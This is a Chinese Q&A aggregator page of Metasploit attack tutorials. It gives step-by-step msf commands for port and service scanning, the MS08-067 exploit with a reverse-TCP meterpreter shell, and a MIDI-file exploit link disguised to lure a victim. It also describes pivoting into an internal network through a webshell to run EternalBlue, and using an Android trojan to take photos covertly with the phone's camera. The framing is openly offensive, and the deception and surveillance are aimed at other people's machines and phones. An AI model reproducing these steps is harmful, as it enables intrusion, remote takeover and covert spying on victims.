导航:首页 > 程序命令 > msf端口迁移命令

msf端口迁移命令

发布时间:2025-01-31 13:54:58

⑴ 如何用Metasploit扫描端口

一、调用Nmap进行扫描
进入msf命令行后直接输入nmap –v –sVip(具体命令和nmap一样)
二、MSF模块扫描
Use auxiliary/scanner/postscan/syn
先用搜索命令搜索有关端口扫描的工具:searchportscan
我们使用Use auxiliary/scanner/postscan/syn
看一下参数配置 showoptions

我们先来设置一下网卡
Set INTERFACE eth0
设置一下扫描的端口,我们这里来扫描80:set PORTS 80
设置扫描目标RHOSTS :set RHOSTS 119.63.37.149
在设置一下线程:set THREADS 100
看一下我们设置好的

这时候我们都设置好了,我们来攻击下,看看效果,用命令run进行攻击
缺点就是扫描的速度有点慢啊

MetaSploit SMB扫描获取系统信息
还是搜索一下smb:searchsmb

这次发现搜出来很多,我们用这个模块
Use auxiliary/scanner/smb/smb_version
看一下需要设置的参数

设定目标ip:set RHOSTS 192.168.188.140
在设置一下线程:set THREAD 10
然后run一下,查看结果

直接扫描出来小伙伴的系统还有主机名,速度不到1s,很快
也可以批量扫描设置批量扫描目标即可 set RHOSTS 192.168.188.50-200

MetaSploit服务识别
我们这里对SSH和FTP进行识别
在这里使用这个模块:use auxiliary/scanner/ssh/ssh_version
然后我们设置一下参数,这里讲设置好的参数截图看一下

Run一下看看结果,其实没有扫出来,好像是屏蔽了,但是用nmap却扫出来了ssh

在试一下ftp,用这个模块:use auxiliary/scanner/ftp/ftp_version
设置下参数

可以看到结果,也没有扫描出来;
MetaSploit SNMP扫描与枚举
搜索一下snmpuse auxiliary/scanner/snmp/snmp_login
看一下他的参数设置

这个参数还是很多的
设定一下目标
然后在run一下
枚举用这个模块
use auxiliary/scanner/snmp/snmp_enum

设置好目标和线程后run一下就可以

MetaSploit远程代码执行
搜索一下08-067,使用这个攻击载荷
use exploit/windows/smb/ms08_067_netapi
同样来看一下参数设置

我们只要设置一下目标就可以,然后我们需要一个载荷来反弹shell
set payload windows/meterpreter/reverse_tcp
然后设置参数

将LHOST 设置为自己的ip(对外攻击不要忘了段口转发)
比如说知道对面的系统是什么版本,可以指定targer,用target查看一下都有什么版本

设置一下目标,假设我们目标机器的系统为10:set target 10
这时候,我们再来看一下其参数设置,发现比以前完备了好多

08-067是不会自动识别系统版本的,但是其他的可以自动识别,所以用其他攻击载荷的时候可以不用设置
然后输入exploit进行攻击即可
这时候会出来一个meterpreter>
我们在里面输入shell,就会反弹一个shell
这样整个攻击过程就完成了

MetaSploit MIDI文件解析远程代码执行
还是来搜索12-004

设置下本机ip set SRVHOST ip
然后攻击

会生成一个连接,但是这个链接容易让人发现,所以我们可以伪装下ip利用URIPATH参数就可以伪装
在设置时,会发现报红,因为4444端口被占用了,所以我们改下监听端口 set LPORT 5555
然后生成连接

只要目标点了这个链接,那么我们就会上线一个shell
说一下,目标点击后我们这边并没有反映,我们需要输下session查看当前会话,会找到上线的机子,连接上线的机子
Session –I 1(id)
然后输入shell就可以拿到shell

⑵ 利用公网Msf+MS17010跨网段攻击内网

环境搭建

攻击机为公网环境下的 Ubuntu 搭配 Metasploit(msf),用于生成木马和监听端口。

目标主机为内网中的 Win7,IP 地址为 192.168.1.107,已有与之同一内网的 Win2003 Webshell,IP 为 192.168.1.106。

在公网主机执行 msf,生成 msf 木马并监听于 1234 端口。

利用已有 Webshell,上传并执行生成的 shell.exe 文件,成功获取目标机内网 192.168.1.106 的 shell。

确定当前路由,添加新路由 192.168.1.0/24 到公网主机,通过该路由访问内网。

扫描目标主机,发现可用 ms17010 漏洞进行攻击。

尝试使用 msf 攻击模块进行攻击,但失败。

在土司论坛求助未找到解决方法,部分人使用原版 fb.py 成功率较高。

最终在 Win2003 机上,通过以下步骤成功攻击:

在 Win2003 上安装 Python 和 pywin32。

将 ETERNALBLUE 目录及其内容复制到 Win2003 机。

在 Win2003 的 windows 目录下创建名为 listeningposts 的文件。

在 Win2003 上运行 fb.py,执行相关命令以生成并利用 ms17010 漏洞进行攻击。

在攻击机上使用 msf 生成 dll 劫持文件并上传至目标机。

在 Win2003 机上执行相关命令,msf 中成功反弹 shell。

整个过程中,本地使用 msf 自带攻击成功,而远程 msf 攻击失败,有待进一步分析原因。

⑶ msf怎么远程监控安卓手机

既然是入侵安卓手机,肯定要先配置一个安卓木马,那我们看看本机的IP

webcam_snap 隐秘拍照功能

后边跟上参数-i 指定使用那个摄像头拍照

可以看见我们分别对前后摄像头都拍了照 保存到了桌面上

还可以输入命令webcam_stream 开启摄像头

阅读全文

与msf端口迁移命令相关的资料

热点内容
jellyfin插件怎么选择主服务器 浏览:836
asp用户注册源码 浏览:48
什么是照片压缩文件 浏览:392
java调用js代码 浏览:979
昆山市民app怎么修改身份信息 浏览:779
php登陆次数 浏览:744
python字符转成数字 浏览:822
海川用的是什么服务器 浏览:376
口才是练出来的pdf 浏览:458
云服务器哪个公司性价比高 浏览:517
源码论坛打包 浏览:558
php怎么做成word 浏览:692
python批量生成密钥 浏览:492
程序员要不要考社区人员 浏览:150
app的钱怎么充q币 浏览:814
android银行卡识别 浏览:756
怎么在app投放广告 浏览:11
手机文件管理怎么看app名称 浏览:192
程序员学数学哪本书最全 浏览:789
macd实战选股公式源码 浏览:644